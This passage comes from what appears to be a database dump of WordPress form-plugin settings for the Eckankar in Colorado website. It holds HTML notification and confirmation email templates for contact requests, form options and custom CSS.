padding-bottom: 100px; background-color: #fff; border-radius: 5px;\\\"><span style=\\\"font-size: 38pt;\\\"><span style=\\\"color: #1d5791;\\\"><strong>Thank You!<\\/strong><\\/span><\\/span>\\n<p>&nbsp;<\\/p>\\n<p><span style=\\\"font-size: 18pt;\\\">We appreciate your inquiry.<br \\/>You will be contacted soon regarding your submission.<\\/span><\\/p>\\n<\\/div>\",\"customPage\":null,\"samePageFormBehavior\":\"hide_form\",\"customUrl\":null},\"restrictions\":{\"limitNumberOfEntries\":{\"enabled\":false,\"numberOfEntries\":null,\"period\":\"total\",\"limitReachedMsg\":\"Maximum number of entries exceeded.\"},\"scheduleForm\":{\"enabled\":false,\"start\":null,\"end\":null,\"selectedDays\":[\"Monday\",\"Tuesday\",\"Wednesday\",\"Thursday\",\"Friday\",\"Saturday\",\"Sunday\"],\"pendingMsg\":\"Form submission is not started yet.\",\"expiredMsg\":\"Form submission is now closed.\"},\"requireLogin\":{\"enabled\":false,\"requireLoginMsg\":\"You must be logged in to submit the form.\"},\"denyEmptySubmission\":{\"enabled\":false,\"message\":\"Sorry, you cannot submit an empty form. Let\'s hear what you wanna say.\"}},\"layout\":{\"labelPlacement\":\"top\",\"helpMessagePlacement\":\"with_label\",\"errorMessagePlacement\":\"inline\",\"cssClassName\":\"\",\"asteriskPlacement\":\"asterisk-right\"},\"delete_entry_on_submission\":\"no\",\"appendSurveyResult\":{\"enabled\":false,\"showLabel\":false,\"showCount\":false}}'),(20,4,'notifications','{\"name\":\"Admin Notification - Initiator\\/ESA Request\",\"sendTo\":{\"type\":\"email\",\"email\":\"webmaster@eckankar-colorado.org\",\"field\":null,\"routing\":[{\"input_value\":\"\",\"field\":null,\"operator\":\"=\",\"value\":null}]},\"fromName\":\"\",\"fromEmail\":\"\",\"replyTo\":\"\",\"bcc\":\"\",\"subject\":\"Form Record Received: Initiator\\/ESA Request\",\"message\":\"<table id=\\\"u_body\\\" style=\\\"border-collapse: collapse; table-layout: fixed; border-spacing: 0; mso-table-lspace: 0pt; mso-table-rspace: 0pt; vertical-align: top; min-width: 320px; margin: 0 auto; background-color: #f1f1f1; width: 100%;\\\" cellspacing=\\\"0\\\" cellpadding=\\\"0\\\">\\n<tbody>\\n<tr style=\\\"vertical-align: top;\\\">\\n<td style=\\\"word-break: break-word; border-collapse: collapse !important; vertical-align: top;\\\">\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px; background-color: transparent;\\\">\\n<div class=\\\"u-row\\\" style=\\\"margin: 0 auto; min-width: 320px; max-width: 500px; overflow-wrap: break-word; word-wrap: break-word; word-break: break-word; background-color: transparent;\\\">\\n<div style=\\\"border-collapse: collapse; display: table; width: 100%; height: 100%; background-color: transparent;\\\">\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px; min-width: 500px; display: table-cell; vertical-align: top;\\\">\\n<div style=\\\"height: 100%; width: 100% !important;\\\">\\n<div style=\\\"box-sizing: border-box; height: 100%; padding: 0px; border: 0px solid transparent;\\\">\\u00a0<\\/div>\\n<\\/div>\\n<\\/div>\\n<\\/div>\\n<\\/div>\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px; background-color: transparent;\\\">\\n<div class=\\\"u-row\\\" style=\\\"margin: 0 auto; min-width: 320px; max-width: 500px; overflow-wrap: break-word; word-wrap: break-word; word-break: break-word; background-color: transparent;\\\">\\n<div style=\\\"border-collapse: collapse; display: table; width: 100%; height: 100%; background-color: transparent;\\\">\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px; min-width: 500px; display: table-cell; vertical-align: top;\\\">\\n<div style=\\\"background-color: #ffffff; height: 100%; width: 100% !important; border-radius: 0px; -webkit-border-radius: 0px; -moz-border-radius: 0px;\\\">\\n<div style=\\\"box-sizing: border-box; height: 100%; padding: 0px; border-radius: 0px; -webkit-border-radius: 0px; -moz-border-radius: 0px; border: 0px solid transparent;\\\">\\n<table style=\\\"font-family: arial,helvetica,sans-serif;\\\" role=\\\"presentation\\\" border=\\\"0\\\" width=\\\"100%\\\" cellspacing=\\\"0\\\" cellpadding=\\\"0\\\">\\n<tbody>\\n<tr>\\n<td style=\\\"overflow-wrap: break-word; word-break: break-word; padding: 10px; font-family: arial,helvetica,sans-serif; background-color: #efefef;\\\" align=\\\"left\\\">\\n<div>\\n<div style=\\\"margin: 0px; line-height: 140%; text-align: center; word-wrap: break-word; font-size: 28px; font-weight: bold; color: #f28a27;\\\">\\n<div style=\\\"font-family: inherit; text-align: center;\\\"><span style=\\\"color: #1d5791; font-family: arial, helvetica, sans-serif; font-size: 39px; letter-spacing: 1px;\\\">Admin Notification<\\/span><\\/div>\\n<\\/div>\\n<\\/div>\\n<\\/td>\\n<\\/tr>\\n<\\/tbody>\\n<\\/table>\\n<\\/div>\\n<\\/div>\\n<\\/div>\\n<\\/div>\\n<\\/div>\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px; background-color: transparent;\\\">\\n<div class=\\\"u-row\\\" style=\\\"margin: 0 auto; min-width: 320px; max-width: 500px; overflow-wrap: break-word; word-wrap: break-word; word-break: break-word; background-color: transparent;\\\">\\n<div style=\\\"border-collapse: collapse; display: table; width: 100%; height: 100%; background-color: transparent;\\\">\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px; min-width: 500px; display: table-cell; vertical-align: top;\\\">\\n<div style=\\\"background-color: #ffffff; height: 100%; width: 100% !important; border-radius: 0px; -webkit-border-radius: 0px; -moz-border-radius: 0px;\\\">\\n<div style=\\\"box-sizing: border-box; height: 100%; padding: 0px; border-radius: 0px; -webkit-border-radius: 0px; -moz-border-radius: 0px; border: 1px solid #CCC;\\\">\\n<table style=\\\"font-family: arial,helvetica,sans-serif; width: 498px; height: 191px;\\\" role=\\\"presentation\\\" border=\\\"0\\\" cellspacing=\\\"0\\\" cellpadding=\\\"0\\\">\\n<tbody>\\n<tr>\\n<td style=\\\"overflow-wrap: break-word; word-break: break-word; padding: 10px; font-family: arial,helvetica,sans-serif;\\\" align=\\\"left\\\">\\n<p style=\\\"-moz-text-size-adjust: none; margin: 0px 0px 20px; text-align: center; font-size: 30px; font-family: raleway; font-weight: 600;\\\"><span style=\\\"color: #b88a02;\\\">Initiation\\/ESA Form Submission<\\/span><\\/p>\\n<p style=\\\"-moz-text-size-adjust: none; margin: 0px 0px 20px; font-size: 19px; text-align: center; font-weight: 600;\\\">Contact with an ECK Initiator or ESA<br \\/>has been requested.<\\/p>\\n<p style=\\\"-moz-text-size-adjust: none; margin: 0px 0px 20px; font-size: 19px; text-align: center; font-weight: 600; background-color: white;\\\">Here is the information that <span style=\\\"color: #1d5791;\\\"> {inputs.names.first_name}<\\/span> <span style=\\\"color: #1d5791;\\\">{inputs.names.last_name}<\\/span> has submitted:<\\/p>\\n<\\/td>\\n<\\/tr>\\n<\\/tbody>\\n<\\/table>\\n<\\/div>\\n<\\/div>\\n<\\/div>\\n<\\/div>\\n<\\/div>\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px; background-color: transparent;\\\">\\n<div class=\\\"u-row\\\" style=\\\"margin: 0 auto; min-width: 320px; max-width: 500px; overflow-wrap: break-word; word-wrap: break-word; word-break: break-word; background-color: transparent;\\\">\\n<div style=\\\"border-collapse: collapse; display: table; width: 100%; height: 100%; background-color: transparent;\\\">\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px; min-width: 500px; display: table-cell; vertical-align: top;\\\">\\n<div style=\\\"background-color: #e8e8e8; height: 100%; width: 100% !important; border-radius: 0px; -webkit-border-radius: 0px; -moz-border-radius: 0px;\\\">\\n<div style=\\\"box-sizing: border-box; height: 100%; padding: 0px; border-radius: 0px; -webkit-border-radius: 0px; -moz-border-radius: 0px; border: 0px solid transparent;\\\">\\n<table style=\\\"font-family: arial,helvetica,sans-serif; width: 496px; height: 115px;\\\" role=\\\"presentation\\\" border=\\\"0\\\" cellspacing=\\\"0\\\" cellpadding=\\\"0\\\">\\n<tbody>\\n<tr>\\n<td style=\\\"overflow-wrap: break-word; word-break: break-word; padding: 10px; color: #333333; font-family: arial,helvetica,sans-serif;\\\" align=\\\"left\\\">\\n<div>\\n<div style=\\\"padding: 20px; background-color: #ffffff; border-radius: 3px; border: 1px solid #cccccc;\\\">\\n<p style=\\\"margin-top: 0; margin-bottom: 12px; font-size: 18px;\\\"><b>FIRST NAME:<\\/b> {inputs.names.first_name}<\\/p>\\n<p style=\\\"margin-top: 0; margin-bottom: 12px; font-size: 18px;\\\"><b>LAST NAME:<\\/b> {inputs.names.last_name}<\\/p>\\n<p style=\\\"margin-top: 0; margin-bottom: 12px; font-size: 18px;\\\"><b>EMAIL:<\\/b> {inputs.email}<\\/p>\\n<p style=\\\"margin-top: 0; margin-bottom: 12px; font-size: 18px;\\\"><b>TELEPHONE: <\\/b> {inputs.input_text}<\\/p>\\n<p style=\\\"margin-top: 0; margin-bottom: 12px; font-size: 18px;\\\"><b>CHOOSE COLORADO REGION:<\\/b> {inputs.input_radio}<\\/p>\\n<p style=\\\"margin-top: 0; margin-bottom: 12px; font-size: 18px;\\\"><b>INITIATOR OR ESA SELECTED:<\\/b> {inputs.dropdown_1}{inputs.dropdown_11}{inputs.dropdown_19}{inputs.dropdown_21}{inputs.dropdown_12}{inputs.dropdown_13}{inputs.dropdown_5}{inputs.dropdown_3}{inputs.dropdown_20}{inputs.dropdown_14}{inputs.dropdown_15}{inputs.dropdown_4}{inputs.dropdown_17}{inputs.dropdown_6}{inputs.dropdown_16}{inputs.dropdown_7}{inputs.dropdown_18}{inputs.dropdown_8}{inputs.dropdown_9}{inputs.dropdown_10}<\\/p>\\n<p style=\\\"margin-top: 0; margin-bottom: 12px; font-size: 18px;\\\"><b>MESSAGE: <\\/b>{inputs.description}<\\/p>\\n<\\/div>\\n<p>&nbsp;<\\/p>\\n<\\/div>\\n<\\/td>\\n<\\/tr>\\n<\\/tbody>\\n<\\/table>\\n<\\/div>\\n<\\/div>\\n<\\/div>\\n<\\/div>\\n<\\/div>\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px; background-color: transparent;\\\">\\n<div class=\\\"u-row\\\" style=\\\"margin: 0 auto; min-width: 320px; max-width: 500px; overflow-wrap: break-word; word-wrap: break-word; word-break: break-word; background-color: transparent;\\\">\\n<div style=\\\"border-collapse: collapse; display: table; width: 100%; height: 100%; background-color: transparent;\\\">\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px; min-width: 500px; display: table-cell; vertical-align: top;\\\">\\n<div style=\\\"background-color: #6e6e6e; height: 100%; width: 100% !important; border-radius: 0px; -webkit-border-radius: 0px; -moz-border-radius: 0px;\\\">\\n<div style=\\\"box-sizing: border-box; height: 100%; padding: 0px; border-radius: 0px; -webkit-border-radius: 0px; -moz-border-radius: 0px; border: 0px solid transparent;\\\">\\n<table style=\\\"font-family: arial,helvetica,sans-serif;\\\" role=\\\"presentation\\\" border=\\\"0\\\" width=\\\"100%\\\" cellspacing=\\\"0\\\" cellpadding=\\\"0\\\">\\n<tbody>\\n<tr>\\n<td style=\\\"overflow-wrap: break-word; word-break: break-word; padding: 10px; font-family: arial,helvetica,sans-serif;\\\" align=\\\"left\\\">\\n<div>\\n<div style=\\\"text-align: center; font-family: arial, helvetica, sans-serif;\\\">\\n<p style=\\\"text-align: center; font-size: 16px; line-height: 20px; color: #cccccc; margin: 0px; font-family: arial, helvetica, sans-serif; padding: 20px;\\\">\\u00a9 Eckankar In Colorado<\\/p>\\n<\\/div>\\n<\\/div>\\n<\\/td>\\n<\\/tr>\\n<\\/tbody>\\n<\\/table>\\n<\\/div>\\n<\\/div>\\n<\\/div>\\n<\\/div>\\n<\\/div>\\n<\\/div>\\n<\\/div>\\n<\\/div>\\n<\\/div>\\n<\\/div>\\n<\\/td>\\n<\\/tr>\\n<\\/tbody>\\n<\\/table>\",\"conditionals\":{\"status\":false,\"type\":\"all\",\"conditions\":[{\"field\":null,\"operator\":\"=\",\"value\":null}]},\"enabled\":true,\"pdf_attachments\":[],\"attachments\":[],\"media_attachments\":[],\"feed_trigger_event\":\"payment_success\",\"asPlainText\":\"no\"}'),(21,4,'notifications','{\"name\":\"User Email Confirmation\",\"sendTo\":{\"type\":\"email\",\"email\":\"{inputs.email}\",\"field\":null,\"routing\":[{\"input_value\":\"\",\"field\":null,\"operator\":\"=\",\"value\":null}]},\"fromName\":\"webmaster@eckankar-colorado.org\",\"fromEmail\":\"webmaster@eckankar-colorado.org\",\"replyTo\":\"webmaster@eckankar-colorado.org\",\"bcc\":\"\",\"subject\":\"Initiator\\/ESA Request\",\"message\":\"<div lang=\\\"en\\\" style=\\\"text-size-adjust: 100%; -webkit-text-size-adjust: 100%; -ms-text-size-adjust: 100%; background-color: #ffffff;\\\" role=\\\"article\\\" aria-roledescription=\\\"email\\\">\\n<table style=\\\"width: 100%; border: none; border-spacing: 0;\\\" role=\\\"presentation\\\">\\n<tbody>\\n<tr>\\n<td style=\\\"padding: 0;\\\" align=\\\"center\\\"><!-- [if mso]><\\/p>\\n<table role=\\\"presentation\\\" align=\\\"center\\\" style=\\\"width:600px;\\\"><tr><td><p>          <![endif]-->\\n<table style=\\\"width: 94%; max-width: 600px; border: none; border-spacing: 0; text-align: left; font-family: Arial,sans-serif; font-size: 16px; line-height: 22px; color: #363636;\\\" role=\\\"presentation\\\">\\n<tbody>\\n<tr>\\n<td style=\\\"padding: 20px 0px 10px 0px; background-color: #ffffff; text-align: center; border-bottom: 1px solid #ccc; border-width: 70%; line-height: 50px;\\\"><img src=\\\"https:\\/\\/eckankar-colorado.org\\/wp-content\\/uploads\\/2023\\/07\\/init-esa-confirmation-blue-2.jpg\\\" alt=\\\"\\\" \\/><\\/td>\\n<\\/tr>\\n<tr>\\n<td style=\\\"padding: 10px 20px 10px 20px; background-color: #f5f5f5; text-align: center; border-bottom: 1px solid #ccc; border-width: 70%; line-height: 40px;\\\">\\n<p style=\\\"margin: 0;\\\"><span style=\\\"color: #1d5791; font-size: 30px; font-family: arial, helvetica, sans-serif;\\\"><strong>- Initiation\\/ESA Request -<br \\/><span style=\\\"color: #c98818;\\\"><em>Confirmation Notification<\\/em><\\/span><\\/p>\\n<\\/td>\\n<\\/tr>\\n<tr>\\n<td style=\\\"padding: 20px 10px 10px 10px; font-size: 0; background-color: #ffffff; border-bottom: 1px solid #f0f0f5; border-color: rgba(201,201,207,.35);\\\"><!-- [if mso]><\\/p>\\n<table role=\\\"presentation\\\" width=\\\"100%\\\"><tr><td style=\\\"width:145px; padding: 15px 10px 11px 10px;\\\" align=\\\"left\\\" valign=\\\"top\\\"><p>                <![endif]-->\\n<div class=\\\"col-lge\\\" style=\\\"display: inline-block; width: 100%; vertical-align: top; padding-bottom: 20px; font-family: Arial,sans-serif; font-size: 18px; color: #363636;\\\">\\n<p style=\\\"margin-top: 0; margin-bottom: 12px; font-size: 22px; line-height: 28px;\\\"><b>Hello {inputs.names.first_name} and thank you for getting in touch!<br \\/><\\/b><\\/p>\\n<p style=\\\"margin-top: 0; margin-bottom: 12px; font-size: 20px; line-height: 28px;\\\">You have requested contact with a Colorado ECK representative regarding either an ESA session or an Initiation. You will be hearing from us soon.<\\/p>\\n<p style=\\\"margin-top: 0; margin-bottom: -5px; font-size: 20px; font-weight: 600;\\\">Here is a copy of the information that you have submitted:<\\/p>\\n<p style=\\\"margin-top: 0; margin-bottom: 12px; font-size: 20px;\\\">\\u00a0<\\/p>\\n<div style=\\\"padding: 20px; background-color: #f5f5f5; border-radius: 3px; border: 1px solid #cccccc;\\\">\\n<p style=\\\"margin-top: 0; margin-bottom: 12px; font-size: 18px;\\\"><b>FIRST NAME:<\\/b> {inputs.names.first_name}<\\/p>\\n<p style=\\\"margin-top: 0; margin-bottom: 12px; font-size: 18px;\\\"><b>LAST NAME:<\\/b> {inputs.names.last_name}<\\/p>\\n<p style=\\\"margin-top: 0; margin-bottom: 12px; font-size: 18px;\\\"><b>EMAIL:<\\/b> {inputs.email}<\\/p>\\n<p style=\\\"margin-top: 0; margin-bottom: 12px; font-size: 18px;\\\"><b>TELEPHONE: <\\/b> {inputs.input_text}<\\/p>\\n<p style=\\\"margin-top: 0; margin-bottom: 12px; font-size: 18px;\\\"><b>CHOOSE COLORADO REGION:<\\/b> {inputs.input_radio}<\\/p>\\n<p style=\\\"margin-top: 0; margin-bottom: 12px; font-size: 18px;\\\"><b>INITIATOR OR ESA SELECTED:<\\/b> {inputs.dropdown_1}{inputs.dropdown_11}{inputs.dropdown_19}{inputs.dropdown_21}{inputs.dropdown_12}{inputs.dropdown_13}{inputs.dropdown_5}{inputs.dropdown_3}{inputs.dropdown_20}{inputs.dropdown_14}{inputs.dropdown_15}{inputs.dropdown_4}{inputs.dropdown_17}{inputs.dropdown_6}{inputs.dropdown_16}{inputs.dropdown_7}{inputs.dropdown_18}{inputs.dropdown_8}{inputs.dropdown_9}{inputs.dropdown_10}<\\/p>\\n<p style=\\\"margin-top: 0; margin-bottom: 12px; font-size: 18px;\\\"><b>MESSAGE: <\\/b>{inputs.description}<\\/p>\\n<\\/div>\\n<\\/div>\\n<\\/td>\\n<\\/tr>\\n<tr>\\n<td style=\\\"padding: 20px; font-size: 16px; line-height: 28px; background-color: #efefef; border-bottom: 1px solid #f0f0f5; border-color: rgba(201,201,207,.35); text-align: center;\\\">You are receiving this email because you have submitted a request through the <a href=\\\"https:\\/\\/eckankar-colorado.org\\/\\\">Eckankar in Colorado<\\/a> website.If you have any questions regarding the origin of this email, please feel free to contact us, we\'re always happy to help out.<\\/td>\\n<\\/tr>\\n<tr>\\n<td style=\\\"padding: 10px; background-color: #6e6e6e;\\\">\\n<figure style=\\\"text-align: center;\\\"><span style=\\\"font-family: arial, helvetica, sans-serif;\\\"><a href=\\\"https:\\/\\/www.facebook.com\\/people\\/Eckankar-in-Colorado\\/100067829705562\\/\\\"><img src=\\\"https:\\/\\/eckankar-colorado.org\\/wp-content\\/uploads\\/2021\\/05\\/fb-icon-email.png\\\" alt=\\\"f\\\" width=\\\"40\\\" height=\\\"40\\\" \\/><\\/a> <\\/span><\\/figure>\\n<figure style=\\\"text-align: center;\\\"><span style=\\\"font-size: 14px; line-height: 20px; color: #cccccc; margin: 0px; font-family: arial, helvetica, sans-serif;\\\">\\u00a9 Eckankar In Colorado<\\/span><br \\/><span style=\\\"font-family: arial, helvetica, sans-serif;\\\"><a title=\\\"Contact Us\\\" href=\\\"mailto:webmaster@eckankar-colorado.org\\\"><span style=\\\"font-size: 14px; line-height: 20px; text-decoration-line: underline; text-decoration-style: solid; text-decoration-color: currentcolor; text-decoration-thickness: auto; color: #cccccc; margin: 0px;\\\">Contact Us<\\/span><\\/a><\\/span><\\/figure>\\n<\\/td>\\n<\\/tr>\\n<\\/tbody>\\n<\\/table>\\n<p><!-- [if mso]>\\n          <\\/td><\\/tr><\\/table><p>          <![endif]--><\\/p>\\n<\\/td>\\n<\\/tr>\\n<\\/tbody>\\n<\\/table>\\n<\\/div>\",\"conditionals\":{\"status\":false,\"type\":\"all\",\"conditions\":[{\"field\":null,\"operator\":\"=\",\"value\":null}]},\"enabled\":true,\"pdf_attachments\":[],\"attachments\":[],\"media_attachments\":[],\"feed_trigger_event\":\"payment_success\",\"asPlainText\":\"no\"}'),(22,4,'_custom_form_css','form.fluent_form_4,\nform.fluent_form_4 button,\nform.fluent_form_4 input,\nform.fluent_form_4 textarea,\nform.fluent_form_4 label,\nform.fluent_form_4 select {\n	font-family: Open Sans;\n	color: #333333;\n}\n/* background color-wrapper */\nform.fluent_form_FF_ID {\n	background-color: #F2F2F2;\n	padding: 40px 50px 20px 50px;\n	border-radius: 5px;\n	box-shadow: rgba(50, 50, 93, 0.25) 0px 50px 100px -20px, rgba(0, 0, 0, 0.3) 0px 30px 60px -30px, rgba(10, 37, 64, 0.35) 0px -2px 6px 0px inset;\n\n}\n.fluentform .ff-el-input--label label {\n   font-size: 18px;\n}\n/* changes Google Privacy message background to frame color */\n.fluentform .ff-el-group {\n  margin-bottom: 20px;\n  background-color: #f2f2f2;\n  padding: 0px;\n  font-size: 16px;\n}\n/* removes border and box shadow from online thank you message */\n.ff-message-success {\n  border: none !important;\n  box-shadow: none !important;\n  margin-top: 10px;\n  padding: 15px;\n  position: relative;\n}'),(23,4,'_custom_form_js',''),(24,4,'advancedValidationSettings','{\"status\":false,\"type\":\"all\",\"conditions\":[{\"field\":\"\",\"operator\":\"=\",\"value\":\"\"}],\"error_message\":\"\",\"validation_type\":\"fail_on_condition_met\"}'),(29,5,'_custom_form_js',''),(30,5,'advancedValidationSettings','{\"status\":false,\"type\":\"all\",\"conditions\":[{\"field\":\"\",\"operator\":\"=\",\"value\":\"\"}],\"error_message\":\"\",\"validation_type\":\"fail_on_condition_met\"}'),(31,5,'notifications','{\"name\":\"Admin Notification Email\",\"sendTo\":{\"type\":\"email\",\"email\":\"{wp.admin_email}\",\"field\":\"email\",\"routing\":[{\"email\":null,\"field\":null,\"operator\":\"=\",\"value\":null}]},\"fromName\":\"\",\"fromEmail\":\"\",\"replyTo\":\"\",\"bcc\":\"\",\"subject\":\"[{inputs.names}] New Form Submission\",\"message\":\"<p>{all_data}<\\/p>\\n<p>This form submitted at: {embed_post.permalink}<\\/p>\",\"conditionals\":{\"status\":false,\"type\":\"all\",\"conditions\":[{\"field\":null,\"operator\":\"=\",\"value\":null}]},\"enabled\":false,\"email_template\":\"\",\"pdf_attachments\":[]}'),(32,5,'notifications','{\"name\":\"Admin Notification - State Leader Contact Request\",\"sendTo\":{\"type\":\"email\",\"email\":\"webmaster@eckankar-colorado.org\",\"field\":null,\"routing\":[{\"input_value\":\"\",\"field\":null,\"operator\":\"=\",\"value\":null}]},\"fromName\":\"\",\"fromEmail\":\"\",\"replyTo\":\"\",\"bcc\":\"\",\"subject\":\"Form Record Received: State Leader Contact Request\",\"message\":\"<table id=\\\"u_body\\\" style=\\\"border-collapse: collapse; table-layout: fixed; border-spacing: 0; mso-table-lspace: 0pt; mso-table-rspace: 0pt; vertical-align: top; min-width: 320px; margin: 0 auto; background-color: #f1f1f1; width: 100%;\\\" cellspacing=\\\"0\\\" cellpadding=\\\"0\\\">\\n<tbody>\\n<tr style=\\\"vertical-align: top;\\\">\\n<td style=\\\"word-break: break-word; border-collapse: collapse !important; vertical-align: top;\\\">\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px; background-color: transparent;\\\">\\n<div class=\\\"u-row\\\" style=\\\"margin: 0 auto; min-width: 320px; max-width: 500px; overflow-wrap: break-word; word-wrap: break-word; word-break: break-word; background-color: transparent;\\\">\\n<div style=\\\"border-collapse: collapse; display: table; width: 100%; height: 100%; background-color: transparent;\\\">\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px; min-width: 500px; display: table-cell; vertical-align: top;\\\">\\n<div style=\\\"height: 100%; width: 100% !important;\\\">\\n<div style=\\\"box-sizing: border-box; height: 100%; padding: 0px; border: 0px solid transparent;\\\">\\u00a0<\\/div>\\n<\\/div>\\n<\\/div>\\n<\\/div>\\n<\\/div>\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px; background-color: transparent;\\\">\\n<div class=\\\"u-row\\\" style=\\\"margin: 0 auto; min-width: 320px; max-width: 500px; overflow-wrap: break-word; word-wrap: break-word; word-break: break-word; background-color: transparent;\\\">\\n<div style=\\\"border-collapse: collapse; display: table; width: 100%; height: 100%; background-color: transparent;\\\">\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px; min-width: 500px; display: table-cell; vertical-align: top;\\\">\\n<div style=\\\"background-color: #ffffff; height: 100%; width: 100% !important; border-radius: 0px; -webkit-border-radius: 0px; -moz-border-radius: 0px;\\\">\\n<div style=\\\"box-sizing: border-box; height: 100%; padding: 0px; border-radius: 0px; -webkit-border-radius: 0px; -moz-border-radius: 0px; border: 0px solid transparent;\\\">\\n<table style=\\\"font-family: arial,helvetica,sans-serif;\\\" role=\\\"presentation\\\" border=\\\"0\\\" width=\\\"100%\\\" cellspacing=\\\"0\\\" cellpadding=\\\"0\\\">\\n<tbody>\\n<tr>\\n<td style=\\\"overflow-wrap: break-word; word-break: break-word; padding: 10px; font-family: arial,helvetica,sans-serif; background-color: #efefef;\\\" align=\\\"left\\\">\\n<div>\\n<div style=\\\"margin: 0px; line-height: 140%; text-align: center; word-wrap: break-word; font-size: 28px; font-weight: bold; color: #f28a27;\\\">\\n<div style=\\\"font-family: inherit; text-align: center;\\\"><span style=\\\"color: #1d5791; font-family: arial, helvetica, sans-serif; font-size: 39px; letter-spacing: 1px;\\\">Admin Notification<\\/span><\\/div>\\n<\\/div>\\n<\\/div>\\n<\\/td>\\n<\\/tr>\\n<\\/tbody>\\n<\\/table>\\n<\\/div>\\n<\\/div>\\n<\\/div>\\n<\\/div>\\n<\\/div>\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px; background-color: transparent;\\\">\\n<div class=\\\"u-row\\\" style=\\\"margin: 0 auto; min-width: 320px; max-width: 500px; overflow-wrap: break-word; word-wrap: break-word; word-break: break-word; background-color: transparent;\\\">\\n<div style=\\\"border-collapse: collapse; display: table; width: 100%; height: 100%; background-color: transparent;\\\">\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px; min-width: 500px; display: table-cell; vertical-align: top;\\\">\\n<div style=\\\"background-color: #ffffff; height: 100%; width: 100% !important; border-radius: 0px; -webkit-border-radius: 0px; -moz-border-radius: 0px;\\\">\\n<div style=\\\"box-sizing: border-box; height: 100%; padding: 0px; border-radius: 0px; -webkit-border-radius: 0px; -moz-border-radius: 0px; border: 1px solid #CCC;\\\">\\n<table style=\\\"font-family: arial,helvetica,sans-serif; width: 498px; height: 191px;\\\" role=\\\"presentation\\\" border=\\\"0\\\" cellspacing=\\\"0\\\" cellpadding=\\\"0\\\">\\n<tbody>\\n<tr>\\n<td style=\\\"overflow-wrap: break-word; word-break: break-word; padding: 10px; font-family: arial,helvetica,sans-serif;\\\" align=\\\"left\\\">\\n<p style=\\\"-moz-text-size-adjust: none; margin: 0px 0px 20px; text-align: center; font-size: 30px; font-family: raleway; font-weight: 600;\\\"><span style=\\\"color: #b88a02;\\\">State Leader\\u00a0<\\/span><span style=\\\"color: #b88a02;\\\">Contact<br \\/>Form Submission<\\/span><\\/p>\\n<p style=\\\"-moz-text-size-adjust: none; margin: 0px 0px 20px; font-size: 19px; text-align: center; font-weight: 600;\\\">Contact with an ECK State Leader<br \\/>has been requested.<\\/p>\\n<p style=\\\"-moz-text-size-adjust: none; margin: 0px 0px 20px; font-size: 19px; text-align: center; font-weight: 600; background-color: white;\\\"><span style=\\\"color: #1d5791;\\\">{inputs.names.first_name}<\\/span> <span style=\\\"color: #1d5791;\\\">{inputs.names.last_name}<\\/span> has submitted the following information:<\\/p>\\n<\\/td>\\n<\\/tr>\\n<\\/tbody>\\n<\\/table>\\n<\\/div>\\n<\\/div>\\n<\\/div>\\n<\\/div>\\n<\\/div>\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px; background-color: transparent;\\\">\\n<div class=\\\"u-row\\\" style=\\\"margin: 0 auto; min-width: 320px; max-width: 500px; overflow-wrap: break-word; word-wrap: break-word; word-break: break-word; background-color: transparent;\\\">\\n<div style=\\\"border-collapse: collapse; display: table; width: 100%; height: 100%; background-color: transparent;\\\">\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px; min-width: 500px; display: table-cell; vertical-align: top;\\\">\\n<div style=\\\"background-color: #e8e8e8; height: 100%; width: 100% !important; border-radius: 0px; -webkit-border-radius: 0px; -moz-border-radius: 0px;\\\">\\n<div style=\\\"box-sizing: border-box; height: 100%; padding: 0px; border-radius: 0px; -webkit-border-radius: 0px; -moz-border-radius: 0px; border: 0px solid transparent;\\\">\\n<table style=\\\"font-family: arial,helvetica,sans-serif; width: 496px; height: 115px;\\\" role=\\\"presentation\\\" border=\\\"0\\\" cellspacing=\\\"0\\\" cellpadding=\\\"0\\\">\\n<tbody>\\n<tr>\\n<td style=\\\"overflow-wrap: break-word; word-break: break-word; padding: 10px; color: #333333; font-family: arial,helvetica,sans-serif;\\\" align=\\\"left\\\">\\n<div>\\n<div style=\\\"padding: 20px; background-color: #ffffff; border-radius: 3px; border: 1px solid #cccccc;\\\">\\n<p style=\\\"margin-top: 0; margin-bottom: 12px; font-size: 18px;\\\"><b>FIRST NAME:<\\/b> {inputs.names.first_name}<\\/p>\\n<p style=\\\"margin-top: 0; margin-bottom: 12px; font-size: 18px;\\\"><b>LAST NAME:<\\/b> {inputs.names.last_name}<\\/p>\\n<p style=\\\"margin-top: 0; margin-bottom: 12px; font-size: 18px;\\\"><b>EMAIL:<\\/b> {inputs.email}<\\/p>\\n<p style=\\\"margin-top: 0; margin-bottom: 12px; font-size: 18px;\\\"><b>TELEPHONE: <\\/b> {inputs.input_text}<\\/p>\\n<p style=\\\"margin-top: 0; margin-bottom: 12px; font-size: 18px;\\\"><b>CHOOSE COLORADO REGION:<\\/b> {inputs.input_radio}<\\/p>\\n<p style=\\\"margin-top: 0; margin-bottom: 12px; font-size: 18px;\\\"><b>STATE LEADER CONTACT SELECTED:<\\/b> {inputs.dropdown}{inputs.dropdown_11}{inputs.dropdown_19}{inputs.dropdown_21}{inputs.dropdown_12}<\\/p>\\n<p style=\\\"margin-top: 0; margin-bottom: 12px; font-size: 18px;\\\"><b>MESSAGE: <\\/b>{inputs.description}<\\/p>\\n<\\/div>\\n<p>&nbsp;<\\/p>\\n<\\/div>\\n<\\/td>\\n<\\/tr>\\n<\\/tbody>\\n<\\/table>\\n<\\/div>\\n<\\/div>\\n<\\/div>\\n<\\/div>\\n<\\/div>\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px; background-color: 